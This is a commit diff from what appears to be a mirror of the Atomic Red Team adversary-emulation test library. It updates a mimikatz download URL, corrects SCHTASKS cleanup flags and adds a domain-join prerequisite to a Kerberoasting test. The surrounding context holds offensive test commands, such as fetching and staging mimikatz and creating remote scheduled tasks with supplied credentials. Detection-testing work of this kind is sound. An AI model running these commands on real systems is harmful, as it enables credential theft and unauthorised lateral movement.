security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into art.io-update

Browse Source
This commit is contained in:
Adam Mashinchi
2021-08-02 08:07:29 -07:00
committed by GitHub
parent ad0e9c4a23 b994e94e40
commit e028fe408a
7 changed files with 40 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+17 -5
View File
@@ -2345,6 +2345,18 @@ credential-access:
there is no output\n"
supported_platforms:
- windows
dependencies:
- description: 'Computer must be domain joined
'
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -16370,7 +16382,7 @@ privilege-escalation:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password}
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
'
@@ -30026,7 +30038,7 @@ defense-evasion:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -44737,7 +44749,7 @@ persistence:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password}
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
'
@@ -60600,7 +60612,7 @@ execution:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password}
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
'
@@ -62510,7 +62522,7 @@ lateral-movement:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
atomics/T1053.005/T1053.005.md
+1 -1
View File
@@ -129,7 +129,7 @@ SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
#### Cleanup Commands:
```cmd
SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1
SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1
```
atomics/T1053.005/T1053.005.yaml
+1 -1
View File
@@ -77,7 +77,7 @@ atomic_tests:
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
cleanup_command: |
SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1
SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
atomics/T1550.002/T1550.002.md
+1 -1
View File
@@ -57,7 +57,7 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
##### Get Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
atomics/T1550.002/T1550.002.yaml
+1 -1
View File
@@ -34,7 +34,7 @@ atomic_tests:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
atomics/T1558.003/T1558.003.md
+12
View File
@@ -47,6 +47,18 @@ Invoke-Kerberoast | fl
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually
```
<br/>
atomics/T1558.003/T1558.003.yaml
+7
View File
@@ -12,6 +12,13 @@ atomic_tests:
If the testing domain doesn't have any service principal name configured, there is no output
supported_platforms:
- windows
dependencies:
- description: |
Computer must be domain joined
prereq_command: |
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Joining this computer to a domain must be done manually
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12